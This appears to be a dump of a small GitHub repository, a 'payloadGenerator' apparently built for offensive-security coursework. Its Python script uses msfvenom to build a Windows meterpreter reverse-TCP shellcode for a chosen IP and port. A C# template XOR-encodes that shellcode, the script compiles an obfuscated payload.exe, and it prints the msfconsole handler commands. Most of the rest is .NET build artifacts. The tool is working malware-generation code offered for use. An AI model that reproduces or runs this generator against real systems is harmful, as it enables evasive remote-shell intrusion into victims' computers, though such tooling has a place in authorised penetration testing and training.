| import subprocess 8 | import argparse 9 | 10 | base_dir = os.getcwd() 11 | 12 | payload = 'windows/x64/meterpreter/reverse_tcp' 13 | 14 | def generateEncodedShell(encoder,ip,port,key): 15 | # Generate msfvenom payload 16 | subprocess.run("msfvenom -a x64 --platform Windows -p {} LHOST={} LPORT={} EXITFUNC=thread -f csharp -o output.cs > /dev/null 2>&1".format(payload,ip,port).split(' '), stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL) 17 | # Read msfvenom payload (output.cs) 18 | shellcode = open('{}/output.cs'.format(base_dir),'r') 19 | shelcode_data = shellcode.read() 20 | # Open the original C# Code for the encoder 21 | original = open('{}/{}/template'.format(base_dir,encoder),'r') 22 | original = original 23 | data = original.read() 24 | # Replace specific bits with the newly generated shellcode and key 25 | data = data.replace('CHANGEME', shelcode_data) 26 | data = data.replace('SPECIALKEY', key) 27 | # Open a new file and write the replaced text here 28 | template = open('{}/{}/Program.cs'.format(base_dir,encoder),'w+') 29 | template.write(data) 30 | # Close files 31 | original.close() 32 | template.close() 33 | shellcode.close() 34 | 35 | def generatePayload(encoder,obfuscater,key): 36 | # Build the XOR version of the shellcode and save it to output.shellcode 37 | os.system('cd {}/{}/ && dotnet run > output.shellcode'.format(base_dir,encoder)) 38 | # Open the shellcode 39 | shellcode = open('{}/{}/output.shellcode'.format(base_dir,encoder),'r') 40 | shelcode_data = shellcode.read() 41 | # Open the original C# code for the payload 42 | original = open('{}/{}/template'.format(base_dir,obfuscater),'r') 43 | data = original.read() 44 | # Replace specific bits with newly generated shellcode and key 45 | data = data.replace('CHANGEME', shelcode_data) 46 | data = data.replace('SPECIALKEY', key) 47 | original.close() 48 | template = open('{}/{}/Program.cs'.format(base_dir,obfuscater),'w+') 49 | template.write(data) 50 | shellcode.close() 51 | 52 | def cleanUp(encoder,obfuscater): 53 | os.system("cd {}/{} && dotnet publish -c Release -r win10-x64 > /dev/null 2>&1".format(base_dir,obfuscater)) 54 | os.system("cp {}/{}/bin/Release/net45/win10-x64/{}.exe {}/payload.exe".format(base_dir,obfuscater,obfuscater,base_dir)) 55 | time.sleep(0.5) 56 | os.system("rm {}/{}/Program.cs && rm {}/{}/Program.cs && rm -rf {}/{}/bin".format(base_dir,obfuscater,base_dir,encoder,base_dir,obfuscater)) 57 | os.system("rm {}/{}/output.shellcode".format(base_dir,encoder)) 58 | os.system("rm -rf {}/{}/bin".format(base_dir,encoder)) 59 | os.system("rm {}/output.cs".format(base_dir)) 60 | 61 | parser = argparse.ArgumentParser(description='Generate obfuscated payloads.') 62 | requiredNamed = parser.add_argument_group('required named arguments') 63 | requiredNamed.add_argument('-ip', dest='ip',help='IP Address for a reverse shell',required=True) 64 | requiredNamed.add_argument('-port', dest='port',help='Port number for a reverse shell',required=True) 65 | requiredNamed.add_argument('-key', dest='key',help='XOR key for reverse shell (example: 0xff)',required=True) 66 | 67 | args = parser.parse_args() 68 | if not args.ip or not args.port or not args.key: 69 | parser.print_help(sys.stderr) 70 | exit() 71 | print(""" 72 | 73 | 74 | GGGGGGGGGGGGG tttt 75 | GGG::::::::::::G ttt:::t 76 | GG:::::::::::::::G t:::::t 77 | G:::::GGGGGGGG::::G t:::::t 78 | G:::::G GGGGGG eeeeeeeeeeee nnnn nnnnnnnn eeeeeeeeeeee rrrrr rrrrrrrrr aaaaaaaaaaaaa ttttttt:::::ttttttt ooooooooooo rrrrr rrrrrrrrr 79 | G:::::G ee::::::::::::ee n:::nn::::::::nn ee::::::::::::ee r::::rrr:::::::::r a::::::::::::a t:::::::::::::::::t oo:::::::::::oo r::::rrr:::::::::r 80 | G:::::G e::::::eeeee:::::een::::::::::::::nn e::::::eeeee:::::eer:::::::::::::::::r aaaaaaaaa:::::at:::::::::::::::::t o:::::::::::::::or:::::::::::::::::r 81 | G:::::G GGGGGGGGGGe::::::e e:::::enn:::::::::::::::ne::::::e e:::::err::::::rrrrr::::::r a::::atttttt:::::::tttttt o:::::ooooo:::::orr::::::rrrrr::::::r 82 | G:::::G G::::::::Ge:::::::eeeee::::::e n:::::nnnn:::::ne:::::::eeeee::::::e r:::::r r:::::r aaaaaaa:::::a t:::::t o::::o o::::o r:::::r r:::::r 83 | G:::::G GGGGG::::Ge:::::::::::::::::e n::::n n::::ne:::::::::::::::::e r:::::r rrrrrrraa::::::::::::a t:::::t o::::o o::::o r:::::r rrrrrrr 84 | G:::::G G::::Ge::::::eeeeeeeeeee n::::n n::::ne::::::eeeeeeeeeee r:::::r a::::aaaa::::::a t:::::t o::::o o::::o r:::::r 85 | G:::::G G::::Ge:::::::e n::::n n::::ne:::::::e r:::::r a::::a a:::::a t:::::t tttttto::::o o::::o r:::::r 86 | G:::::GGGGGGGG::::Ge::::::::e n::::n n::::ne::::::::e r:::::r a::::a a:::::a t::::::tttt:::::to:::::ooooo:::::o r:::::r 87 | GG:::::::::::::::G e::::::::eeeeeeee n::::n n::::n e::::::::eeeeeeee r:::::r a:::::aaaa::::::a tt::::::::::::::to:::::::::::::::o r:::::r 88 | GGG::::::GGG:::G ee:::::::::::::e n::::n n::::n ee:::::::::::::e r:::::r a::::::::::aa:::a tt:::::::::::tt oo:::::::::::oo r:::::r 89 | GGGGGG GGGG eeeeeeeeeeeeee nnnnnn nnnnnn eeeeeeeeeeeeee rrrrrrr aaaaaaaaaa aaaa ttttttttttt ooooooooooo rrrrrrr 90 | 91 | 92 | 93 | 94 | 95 | by Fawaz - Twitter: @Q8fawazo 96 | 97 | """) 98 | print('> Generator goes brrrr') 99 | print('> Generating encoded shellcode') 100 | generateEncodedShell('xor',args.ip,args.port,args.key) 101 | print('> Generating payload') 102 | generatePayload('xor','Payload',args.key) 103 | print('> Cleanup') 104 | cleanUp('xor','Payload') 105 | print('> Open msfconsole and run the following:\n\n') 106 | print('use exploit/multi/handler') 107 | print('set payload {}'.format(payload)) 108 | print('set LHOST {}'.format(args.ip)) 109 | print('set LPORT {}'.format(args.port)) 110 | print('set EXITFUNC thread') 111 | print('run -j') 112 | print('\nYou should see payload.exe now') 113 | exit() 114 | 115 | 116 | 117 | 118 | #print(args.accumulate(args.integers)) -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/.NETCoreApp,Version=v3.1.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETCoreApp,Version=v3.1", FrameworkDisplayName = "")] 5 | -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/apphost: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/xor/obj/Debug/netcoreapp3.1/apphost -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/xor/obj/Debug/netcoreapp3.1/xor -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // 5 | // Changes to this file may cause incorrect behavior and will be lost if 6 | // the code is regenerated. 7 | // 8 | //------------------------------------------------------------------------------ 9 | 10 | using System; 11 | using System.Reflection; 12 | 13 | [assembly: System.Reflection.AssemblyCompanyAttribute("xor")] 14 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 15 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 16 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 17 | [assembly: System.Reflection.AssemblyProductAttribute("xor")] 18 | [assembly: System.Reflection.AssemblyTitleAttribute("xor")] 19 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 20 | 21 | // Generated by the MSBuild WriteCodeFragment class. 22 | 23 | -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 68ae4fd0d292246506105e0caa6b8b381329ad91 2 | -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/xor/obj/Debug/netcoreapp3.1/xor.assets.cache -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | d45b5a4afd59f7be106f960fa40f9a2af02ae9d4 2 | -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor 2 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.deps.json 3 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.runtimeconfig.json 4 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.runtimeconfig.dev.json 5 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.dll 6 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.pdb 7 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.csprojAssemblyReference.cache 8 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfoInputs.cache 9 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfo.cs 10 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.csproj.CoreCompileInputs.cache 11 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.dll 12 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.pdb 13 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.genruntimeconfig.cache 14 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor 15 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.deps.json 16 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.runtimeconfig.json 17 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.runtimeconfig.dev.json 18 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.dll 19 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.pdb 20 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.csprojAssemblyReference.cache 21 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfoInputs.cache 22 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfo.cs 23 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.csproj.CoreCompileInputs.cache 24 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.dll 25 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.pdb 26 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.genruntimeconfig.cache 27 | -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/xor/obj/Debug/netcoreapp3.1/xor.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/xor/obj/Debug/netcoreapp3.1/xor.dll -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | eb3d0c7d51ea2aa9aee6f06375357930deb0502a 2 | -------------------------------------------------------------------------------- /xor/obj/Debug/netcoreapp3.1/xor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/xor/obj/Debug/netcoreapp3.1/xor.pdb -------------------------------------------------------------------------------- /xor/obj/project.assets.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": 3, 3 | "targets": { 4 | ".NETCoreApp,Version=v3.1": {} 5 | }, 6 | "libraries": {}, 7 | "projectFileDependencyGroups": { 8 | ".NETCoreApp,Version=v3.1": [] 9 | }, 10 | "packageFolders": { 11 | "/home/kali/.nuget/packages/": {} 12 | }, 13 | "project": { 14 | "version": "1.0.0", 15 | "restore": { 16 | "projectUniqueName": "/opt/Generator/xor/xor.csproj", 17 | "projectName": "xor", 18 | "projectPath": "/opt/Generator/xor/xor.csproj", 19 | "packagesPath": "/home/kali/.nuget/packages/", 20 | "outputPath": "/opt/Generator/xor/obj/", 21 | "projectStyle": "PackageReference", 22 | "configFilePaths": [ 23 | "/home/kali/.nuget/NuGet/NuGet.Config" 24 | ], 25 | "originalTargetFrameworks": [ 26 | "netcoreapp3.1" 27 | ], 28 | "sources": { 29 | "https://api.nuget.org/v3/index.json": {} 30 | }, 31 | "frameworks": { 32 | "netcoreapp3.1": { 33 | "targetAlias": "netcoreapp3.1", 34 | "projectReferences": {} 35 | } 36 | }, 37 | "warningProperties": { 38 | "warnAsError": [ 39 | "NU1605" 40 | ] 41 | } 42 | }, 43 | "frameworks": { 44 | "netcoreapp3.1": { 45 | "targetAlias": "netcoreapp3.1", 46 | "imports": [ 47 | "net461", 48 | "net462", 49 | "net47", 50 | "net471", 51 | "net472", 52 | "net48" 53 | ], 54 | "assetTargetFallback": true, 55 | "warn": true, 56 | "frameworkReferences": { 57 | "Microsoft.NETCore.App": { 58 | "privateAssets": "all" 59 | } 60 | }, 61 | "runtimeIdentifierGraphPath": "/usr/share/dotnet/sdk/5.0.202/RuntimeIdentifierGraph.json" 62 | } 63 | } 64 | } 65 | } -------------------------------------------------------------------------------- /xor/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "xLJja1puJEt5zjDAAmT8E3QDk8JZqn/CLLdVwfwU97SaDObD5NYwj9KFO/50jOqCYJsoCN3H7+2cynrQI+rSNQ==", 4 | "success": true, 5 | "projectFilePath": "/opt/Generator/xor/xor.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /xor/obj/xor.csproj.nuget.dgspec.json: -------------------------------------------------------------------------------- 1 | { 2 | "format": 1, 3 | "restore": { 4 | "/opt/Generator/xor/xor.csproj": {} 5 | }, 6 | "projects": { 7 | "/opt/Generator/xor/xor.csproj": { 8 | "version": "1.0.0", 9 | "restore": { 10 | "projectUniqueName": "/opt/Generator/xor/xor.csproj", 11 | "projectName": "xor", 12 | "projectPath": "/opt/Generator/xor/xor.csproj", 13 | "packagesPath": "/home/kali/.nuget/packages/", 14 | "outputPath": "/opt/Generator/xor/obj/", 15 | "projectStyle": "PackageReference", 16 | "configFilePaths": [ 17 | "/home/kali/.nuget/NuGet/NuGet.Config" 18 | ], 19 | "originalTargetFrameworks": [ 20 | "netcoreapp3.1" 21 | ], 22 | "sources": { 23 | "https://api.nuget.org/v3/index.json": {} 24 | }, 25 | "frameworks": { 26 | "netcoreapp3.1": { 27 | "targetAlias": "netcoreapp3.1", 28 | "projectReferences": {} 29 | } 30 | }, 31 | "warningProperties": { 32 | "warnAsError": [ 33 | "NU1605" 34 | ] 35 | } 36 | }, 37 | "frameworks": { 38 | "netcoreapp3.1": { 39 | "targetAlias": "netcoreapp3.1", 40 | "imports": [ 41 | "net461", 42 | "net462", 43 | "net47", 44 | "net471", 45 | "net472", 46 | "net48" 47 | ], 48 | "assetTargetFallback": true, 49 | "warn": true, 50 | "frameworkReferences": { 51 | "Microsoft.NETCore.App": { 52 | "privateAssets": "all" 53 | } 54 | }, 55 | "runtimeIdentifierGraphPath": "/usr/share/dotnet/sdk/5.0.202/RuntimeIdentifierGraph.json" 56 | } 57 | } 58 | } 59 | } 60 | } -------------------------------------------------------------------------------- /xor/obj/xor.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | /home/kali/.nuget/packages/ 8 | /home/kali/.nuget/packages/ 9 | PackageReference 10 | 5.9.1 11 | 12 | 13 | 14 | 15 | 16 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 17 | 18 | -------------------------------------------------------------------------------- /xor/obj/xor.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /xor/template: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace XorCoder 8 | { 9 | public class Program 10 | { 11 | public static void Main(string[] args) 12 | { 13 | CHANGEME 14 | byte[] encoded = new byte[buf.Length]; 15 | for (int i = 0; i < buf.Length; i++) 16 | { 17 | encoded[i] = (byte)((uint)buf[i] ^ SPECIALKEY); 18 | } 19 | 20 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 21 | int totalCount = encoded.Length; 22 | for (int count = 0; count < totalCount; count++) 23 | { 24 | byte b = encoded[count]; 25 | 26 | if ((count + 1) == totalCount) { 27 | hex.AppendFormat("0x{0:x2}", b); 28 | } 29 | else 30 | { 31 | hex.AppendFormat("0x{0:x2}, ", b); 32 | } 33 | 34 | if ((count + 1) % 15 == 0) 35 | { 36 | hex.Append("\n"); 37 | } 38 | } 39 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};"); 40 | 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /xor/xor.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | --------------------------------------------------------------------------------